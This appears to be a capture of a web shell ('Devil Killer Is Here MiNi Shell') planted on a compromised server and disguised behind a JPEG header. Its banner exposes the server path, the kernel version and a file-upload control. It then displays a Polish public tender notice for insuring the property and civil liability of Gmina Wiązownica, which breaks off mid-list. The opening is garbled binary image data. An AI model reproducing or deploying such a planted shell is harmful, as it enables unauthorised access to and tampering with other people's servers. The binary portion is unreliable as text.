JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20240705/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20240705/0039901801-N-2024.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> „Ubezpieczenie mienia i odpowiedzialności cywilnej Gminy Wiązownica” </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzi podmiot, któremu powierzono przeprowadzenie postępowania</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Gmina Wiązownica</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 650900364</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Warszawska</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Wiązownica</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">37-522</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">podkarpackie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL822 - Przemyski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">sekretariat@wiazownica.com</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">http://wiazownica.com/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h3 class="mb-0">1.11.) Dane podmiotu, któremu zamawiający powierzył przeprowadzenie postępowania.</h3> <h3 class="p-2 mt-4 bg-light">Podmiot <span class="normal">1</span></h3> <h3 class="mb-0">1.11.1.) Nazwa podmiotu prowadzącego postępowanie: <span class="normal">Kancelaria Brokerska Aspergo Sp. z o.o.</span></h3> <h3 class="mb-0">1.11.2.) Krajowy Numer Identyfikacyjny: <span class="normal">677 229 53 00</span></h3> <h3 class="mb-0">Adres podmiotu prowadzącego postępowanie: </h3> <h3 class="mb-0">1.11.3.) Ulica: <span class="normal">ul. Pułkownika Ryszarda Kuklińskiego 17a</span></h3> <h3 class="mb-0">1.11.4.) Miejscowość: <span class="normal">Kraków</span></h3> <h3 class="mb-0">1.11.5.) Kod pocztowy: <span class="normal">30-720</span></h3> <h3 class="mb-0">1.11.6.) Województwo: <span class="normal">małopolskie</span></h3> <h3 class="mb-0">1.11.7.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.11.8.) Lokalizacja NUTS 3: <span class="normal">PL213 - Miasto Kraków</span></h3> <h3 class="mb-0">1.11.11.) Adres poczty elektronicznej: <span class="normal">przetargi@aspergo.pl</span></h3> <h3 class="mb-0">1.11.12.) Adres strony internetowej: <span class="normal">https://www.aspergo.pl</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> „Ubezpieczenie mienia i odpowiedzialności cywilnej Gminy Wiązownica” </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-0262e66d-3aa7-11ef-880f-0e435a8a43bc</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2024/BZP 00399018</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2024-07-05</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2024/BZP 00100784/04/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.3 „Ubezpieczenie mienia i odpowiedzialności cywilnej Gminy Wiązownica”</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 2 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/pn/aspergo <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://platformazakupowa.pl/pn/aspergo</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">5.1.	W postępowaniu komunikacja między Zamawiającym z Wykonawcami odbywa się drogą elektroniczną za pośrednictwem platformy zakupowej dostępnej pod adresem https://platformazakupowa.pl/pn/aspergo zwanej dalej „Platformą”.<br/>5.2.	Postępowanie prowadzone jest w języku polskim w formie elektronicznej za pośrednictwem Platformy zakupowej zwanej dalej „Platformą”, pod adresem: https://platformazakupowa.pl/pn/aspergo <br/>5.3.	Wykonawca zamierzający wziąć udział w niniejszym postępowaniu o udzielenie zamówienia publicznego, musi posiadać konto na Platformie. Korzystanie z Platformy przez Wykonawcę jest bezpłatne. <br/>5.4.	Wszelkie oświadczenia, wnioski, zawiadomienia oraz informacje (z wyjątkiem ofert) przekazywane są przy użyciu środków komunikacji elektronicznej za pośrednictwem formularza na Platformie: „wyślij wiadomość do zamawiającego”.<br/>5.5.	Ofertę należy złożyć na platformie pod adresem: https://platformazakupowa.pl/pn/aspergo <br/>5.6.	Za datę przekazania oferty przyjmuje się datę jej przekazania w systemie (platformie) w drugim kroku składania oferty poprzez kliknięcie przycisku “Złóż ofertę” i wyświetlenie się komunikatu, że oferta została zaszyfrowana i złożona.<br/>5.7.	Zamawiający informuje, że instrukcje korzystania z Platformy dotyczące w szczególności logowania, składania wniosków o wyjaśnienie treści SWZ, składania ofert, zmiany i wycofania oferty oraz innych czynności podejmowanych w niniejszym postępowaniu przy użyciu Platformy zakupowej znajdują się w zakładce „Instrukcje dla Wykonawców&#34; na stronie internetowej pod adresem: https://platformazakupowa.pl/strona/45-instrukcje . <br/>5.8.	Wykonawca, jako podmiot profesjonalny, ma obowiązek sprawdzania komunikatów i wiadomości bezpośrednio na www.platformazakupowa.pl przesłanych przez zamawiającego, gdyż system powiadomień może ulec awarii lub powiadomienie może trafić do folderu SPAM.<br/>5.9.	Zamawiający, zgodnie z Rozporządzeniem Prezesa Rady Ministrów z dnia 30 grudnia 2020 r. <br/>w sprawie sposobu sporządzania i przekazywania informacji oraz wymagań technicznych dla dokumentów elektronicznych oraz środków komunikacji elektronicznej w postępowaniu o udzielenie zamówienia publicznego lub konkursie (Dz. U. poz. 2452) zwane dalej: “Rozporządzenie w sprawie środków komunikacji”, określa niezbędne wymagania sprzętowo - aplikacyjne umożliwiające pracę na platformie zakupowej, tj.:<br/>5.9.1.	stały dostęp do sieci Internet o gwarantowanej przepustowości nie mniejszej niż 512 kb/s,<br/>5.9.2.	komputer klasy PC lub MAC o następującej konfiguracji: pamięć min. 2 GB Ram, procesor Intel IV 2 GHZ lub jego nowsza wersja, jeden z systemów operacyjnych - MS Windows 7, Mac Os x 10 4, Linux, lub ich nowsze wersje,<br/>5.9.3.	zainstalowana dowolna przeglądarka internetowa, w przypadku Internet Explorer minimalnie wersja 10 0.,<br/>5.9.4.	włączona obsługa JavaScript,<br/>5.9.5.	zainstalowany program Adobe Acrobat Reader lub inny obsługujący format plików .pdf,<br/>5.9.6.	Platforma działa według standardu przyjętego w komunikacji sieciowej - kodowanie UTF8,<br/>5.9.7.	Oznaczenie czasu odbioru danych przez platformę zakupową stanowi datę oraz dokładny czas (hh:mm:ss) generowany wg. czasu lokalnego serwera synchronizowanego z zegarem Głównego Urzędu Miar.<br/>5.10.	Wykonawca, przystępując do niniejszego postępowania o udzielenie zamówienia publicznego:<br/>5.10.1.	akceptuje warunki korzystania z platformazakupowa.pl określone w Regulaminie zamieszczonym na stronie internetowej https://platformazakupowa.pl/strona/1-regulamin <br/>w zakładce „Regulamin&#34; oraz uznaje go za wiążący,<br/>5.10.2.	zapoznał i stosuje się do Instrukcji obsługi Platformy dostępnej https://platformazakupowa.pl/strona/45-instrukcje</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 Rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych), (Dz. Urz. UE.L Nr 119, str. 1), zwanego dalej „RODO” informujemy , że:<br/> <br/>1.	Administratorem danych osobowych jest: Urząd Gminy Wiązownica, ul. Warszawska 15, 37-522 Wiązownica.<br/>2.	Jeśli ma Pani/Pan pytania dotyczące sposobu i zakresu przetwarzania Pani/Pana danych osobowych w zakresie działania Urzędu Gminy Wiązownica, a także przysługujących Pani/Panu uprawnień, może się Pani/Pan skontaktować się z Inspektorem Ochrony Danych Osobowych za pomocą adresu ckg@tokarczykipartnerzy.pl.<br/>3.	Administrator danych osobowych przetwarza Pani/Pana dane osobowe na podstawie obowiązujących przepisów prawa, zawartych umów oraz na podstawie udzielonej zgody.<br/>4.	Pani/Pana dane osobowe przetwarzane są w celu/celach:<br/>a.	wypełnienia obowiązków prawnych ciążących na Administratorze;<br/>b.	realizacji umów zawartych z kontrahentami Gminy Wiązownica;<br/>c.	w pozostałych przypadkach Pani/Pana dane osobowe przetwarzane są wyłącznie na podstawie wcześniej udzielonej zgody w zakresie i celu określonym w treści zgody.<br/>5.	W związku z przetwarzaniem danych w celach o których mowa w pkt 4 odbiorcami Pani/Pana danych osobowych mogą być:<br/>a.	organy władzy publicznej oraz podmioty wykonujące zadania publiczne lub działające na zlecenie organów władzy publicznej, w zakresie i w celach, które wynikają z przepisów powszechnie obowiązującego prawa;<br/>b.	inne podmioty, które na podstawie stosownych umów podpisanych z Gminą Wiązownica przetwarzają dane osobowe. <br/>6.	Pani/Pana dane osobowe będą przechowywane przez okres niezbędny do realizacji celów określonych w pkt 4, a po tym czasie przez okres oraz w zakresie wymaganym przez przepisy powszechnie obowiązującego prawa.<br/>7.	W związku z przetwarzaniem Pani/Pana danych osobowych przysługują Pani/Panu następujące uprawnienia:<br/>•	prawo dostępu do danych osobowych, w tym prawo do uzyskania kopii tych danych;<br/>•	prawo do żądania sprostowania (poprawiania) danych osobowych,<br/>•	prawo do żądania usunięcia danych osobowych (tzw. prawo do bycia zapomnianym),<br/>•	prawo do żądania ograniczenia przetwarzania danych osobowych,<br/>•	prawo do przenoszenia danych,<br/>•	prawo sprzeciwu wobec przetwarzania danych,<br/>8.	Dane nie będą przekazywane poza Europejski Obszar Gospodarczy. Administrator jednocześnie informuje, że w celu ochrony danych przed ich utratą zostały wdrożone odpowiednie procedury.<br/>9.	Przysługuje Panu/Pani prawo wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pan/Pani, iż przetwarzanie danych osobowych Pana/Pani dotyczących, narusza przepisy ustawy o ochronie danych osobowych z dnia 10 maja 2018 r.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">RG3.271.17.2024</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.6.) Wartość zamówienia stanowiącego przedmiot tego postępowania (bez VAT): <span class="normal"> 215000,00 PLN </span> </h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 3.1.	Przedmiotem zamówienia jest: „Ubezpieczenie mienia i odpowiedzialności cywilnej Gminy Wiązownica”.<br/>3.2.	Nomenklatura Wspólnego Słownika Zamówień Publicznych (kod CPV): <br/>3.2.1.	66.51.00.00-8 – Usługi ubezpieczeniowe; <br/>3.2.2.	66.51.50.00-3 - Usługi ubezpieczenia od uszkodzenia lub utraty<br/>3.2.3.	66.51.51.00-4 - Usługi ubezpieczenia od ognia<br/>3.2.4.	66.51.54.00-7 - Usługi ubezpieczenia od skutków żywiołów<br/>3.2.5.	66.51.60.00-0 - Usługi ubezpieczenia od ogólnej odpowiedzialności cywilnej<br/>3.3.	Zamówienie nie jest podzielone na Części. Wykonawca może złożyć ofertę na całość zamówienia.<br/>Uzasadnienie: Zamawiający nie dokonuje podziału zamówienia na części w celu uzyskania możliwie jak najkorzystniejszych warunków finansowych. Służy temu również formuła postępowania polegająca na przeprowadzeniu postępowania oraz udzieleniu jednego zamówienia publicznego przez Zamawiającego oraz jednostki organizacyjne. Należy również zauważyć, że możliwość dokonywania podziału zamówień na części wynika z motywu 78 Dyrektywy Parlamentu Europejskiego i Rady 2014/24/UE z dnia 26 lutego 2014 r. w sprawie zamówień publicznych, uchylającej dyrektywę 2004/18/WE. Zgodnie z motywem 78 tej Dyrektywy „instytucje zamawiające należy w szczególności zachęcać do dzielenia dużych zamówień na części”. Intencją ustawodawcy europejskiego co do potrzeby dokonywania podziału zamówień „dużych” na części – jak czytamy w motywie 78 ww. Dyrektywy - była chęć dostosowania tego rodzaju zamówień do potrzeb małych i średnich przedsiębiorstw. Z kolei - jak wspomniano wyżej - niniejsze zamówienie nie jest zamówieniem dużym, a jego zakres - bez dokonywania podziału na części – w ocenie Zamawiającego wychodzi naprzeciw potrzebom małych i średnich przedsiębiorstw. Zdaniem Zamawiającego, małe i średnie przedsiębiorstwa dysponują wystarczającym potencjałem w celu wykonania niniejszego zamówienia. Z tych też powodów Zamawiający zaniechał dokonania podziału niniejszego zamówienia na części.<br/><br/>UBEZPIECZENIE MIENIA ORAZ ODPOWIEDZIALNOŚCI CYWILNEJ w tym:<br/>1.	Ubezpieczenie odpowiedzialności cywilnej tytułem prowadzonej działalności i posiadanego mienia w tym ubezpieczenie odpowiedzialności cywilnej zarządcy drogi;<br/>2.	Ubezpieczenie mienia od wszystkich ryzyk;<br/>3.	Ubezpieczenie sprzętu elektronicznego;<br/><br/>3.4.	Szczegółowy opis przedmiotu zamówienia zawiera: <br/>3.4.1.	Załącznik nr 1 do SWZ - Program ubezpieczenia <br/>3.5.	Zamawiający wymaga, aby Wykonawca działający w formie towarzystwa ubezpieczeń wzajemnych posiadał statut, z którego wynika, że towarzystwo będzie ubezpieczało także osoby (jednostki) nie będące członkami towarzystwa. Zamawiający (oraz wszystkie jego jednostki) będzie traktowany przez takiego Wykonawcę jako osoba nie będąca członkiem towarzystwa, a co za tym idzie nie będzie zobowiązany do udziału w pokrywaniu strat towarzystwa przez wnoszenie dodatkowej składki, zgodnie z art. 111 ust. 2 ustawy z dnia 11 września 2015 r. o działalności ubezpieczeniowej <br/>i reasekuracyjnej (t. j. Dz. U. z 2023 r., poz. 656 z późn. zm.), dalej „ustawa o działalności ubezpieczeniowej i reasekuracyjnej”.<br/>3.6.	Wykonawca musi posiadać ogólne (szczególne) warunki wszystkich ubezpieczeń określonych <br/>w przedmiocie zamówienia, o udzielenie której się ubiega.<br/>3.7.	Przy wykonywaniu umów ubezpieczenia Zamawiający korzysta z usług świadczonych przez Kancelarię Brokerską ASPERGO sp. z o.o. z siedzibą w Krakowie, ul. Pułkownika Ryszarda Kuklińskiego 17a, 30-720 Kraków, na podstawie udzielonego ze strony Zamawiającego zlecenia.<br/>3.8.	Zamawiający nie dopuszcza składania ofert wariantowych.<br/>3.9.	Zamawiający nie przewiduje wizji lokalnej.<br/>3.10.	Niniejszą Specyfikację można wykorzystać wyłącznie zgodnie z jej przeznaczeniem. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">66510000-8 - Usługi ubezpieczeniowe</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">66515000-3 - Usługi ubezpieczenia od uszkodzenia lub utraty</p> <p class="mb-0">66515100-4 - Usługi ubezpieczenia od ognia</p> <p class="mb-0">66515400-7 - Usługi ubezpieczenia od skutków żywiołów</p> <p class="mb-0">66516000-0 - Usługi ubezpieczenia od odpowiedzialności cywilnej</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">23 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">19.1	Zamawiający przyzna złożonym ofertom punkty, zgodnie z kryteriami oceny ofert określonymi w pkt 13.<br/>19.2	Zamawiający informuje, że w przypadku akceptacji przez Wykonawcę dodatkowych klauzul fakultatywnych, przyzna punkty pomocnicze, które zostaną doliczone do punktacji wynikającej <br/>z kryteriów oceny ofert.<br/>19.3	Zamawiający informuje, że łączna liczba punktów pomocniczych (w kryterium klauzul fakultatywnych) wynosi :<br/><br/>Liczba<br/>punktów pomocniczych <br/>361<br/><br/>Sposób dokonywania oceny zamówienia będzie następujący:<br/><br/>UBEZPIECZENIE MIENIA ORAZ ODPOWIEDZIALNOŚCI CYWILNEJ.<br/><br/>W kryterium Cena [ P ] oferty będą oceniane na podstawie poniższego wzoru:<br/><br/>Pi = Cmin / Ci * 100 * 60%<br/><br/>Pi	liczba punktów w kryterium cena [P] przyznanych ofercie rozpatrywanej;<br/>Cmin	najniższa zaoferowana cena oferty niepodlegającej odrzuceniu<br/>Ci	cena badanej oferty<br/><br/><br/>W kryterium Serwis Posprzedażny [ SP ] oferty będę oceniane w oparciu o punkty pomocnicze przyznawane za akceptację klauzul tj. :<br/><br/>SPi = Si / Smax * 100 * 20%<br/><br/>SPi liczba punktów w kryterium serwis posprzedażny [SP] przyznanych ofercie rozpatrywanej<br/>Smax	oferta z najwyższą liczbą punktów pomocniczych przyznanych za akceptację klauzul w kryterium Serwis posprzedażny niepodlegająca odrzuceniu<br/>Si	liczba punktów pomocniczych przyznanych za akceptację klauzul w kryterium Serwis posprzedażny badanej oferty w oparciu o punkty pomocnicze przyznawane za akceptację lub jej brak poniższych klauzul tj.<br/>	klauzula funduszu prewencyjnego <br/>•	Akceptacja klauzuli funduszu prewencyjnego – 4 punkty pomocnicze<br/>•	Brak akceptacji klauzuli funduszu prewencyjnego – 0 punktów pomocniczych<br/>	klauzula wykonania terminu oględzin<br/>•	Akceptacja klauzuli wykonania terminu oględzin – 4 punkty pomocnicze<br/>•	Brak akceptacji klauzuli wykonania terminu oględzin – 0 punktów pomocniczych<br/>	klauzula samolikwidacji szkód<br/>•	akceptacja klauzuli – 4 punkty pomocnicze<br/>•	brak akceptacji klauzuli – 0 punktów pomocniczych<br/>	klauzula wypłaty zaliczki<br/>•	akceptacja klauzuli – 4 punkty pomocnicze<br/>•	brak akceptacji klauzuli – 0 punktów pomocniczych<br/>	klauzula dedykowanego likwidatora<br/>•	akceptacja klauzuli – 4 punkty pomocnicze<br/>•	brak akceptacji klauzuli – 0 punktów pomocniczych<br/><br/><br/>W kryterium Klauzule fakultatywne [ Z ] oferty będę oceniane w oparciu o punkty pomocnicze przyznawane za akceptację dodatkowych klauzul fakultatywnych.<br/><br/>Zi = Li / Lmax * 100 * 20%<br/><br/>Zi	liczba punktów w kryterium zakres ochrony ubezpieczeniowej [Z] przyznanych ofercie rozpatrywanej<br/>Li	liczba punktów pomocniczych badanej oferty<br/>Lmax	najwyższa liczba uzyskanych punktów pomocniczych uzyskanych w danej Części dla oferty niepodlegającej odrzuceniu<br/><br/>Punkty pomocnicze będą przyznawane rozpatrywanej ofercie za akceptację dodatkowych klauzul fakultatywnych, zgodnie z niniejszą punktacją.<br/><br/>Wykonawca może zdobyć łącznie 361 punktów pomocniczych w tym:<br/><br/>Ubezpieczenie odpowiedzialności cywilnej:<br/>Lp.	Nazwa dodatkowej klauzuli fakultatywnej	Ilość punktów <br/>możliwych do uzyskania<br/>1. klauzula 72 godzin w ubezpieczeniu OC	10<br/>2. klauzula reprezentantów	10<br/>3. klauzula wibracji 10<br/>4. Klauzula podwyższenia do pełnej sumy ubezpieczenia za szkody wyrządzone przez Jednostki OSP podczas wykonywania statutowych działalności	5<br/><br/>Ubezpieczenie mienia od wszystkich ryzyk:<br/>Lp.	Nazwa dodatkowej klauzuli fakultatywnej	Ilość punktów <br/>możliwych do uzyskania<br/>1. Klauzula katastrofy budowlanej	15<br/>2. Klauzula kosztów dodatkowych	10<br/>3. Klauzula kosztów odtworzenia dokumentacji	5<br/>4. Klauzula kosztów usunięcia pozostałości po szkodzie, kosztów akcji ratowniczych oraz zabezpieczenia przed szkodą	10<br/>5. Klauzula likwidacyjna środków trwałych	5<br/>6. Klauzula niezawiadomienia w terminie o szkodzie	7<br/>7. Klauzula ochrony mienia wyłączonego z eksploatacji A	15<br/>8. Klauzula poszukiwania przyczyny powstania szkody	5<br/>9. Klauzula przezornej sumy ubezpieczenia	10<br/>10. Klauzula rezygnacji z odtworzenia	10<br/>11. Klauzula rzeczoznawców	5<br/>12. Klauzula terroryzmu	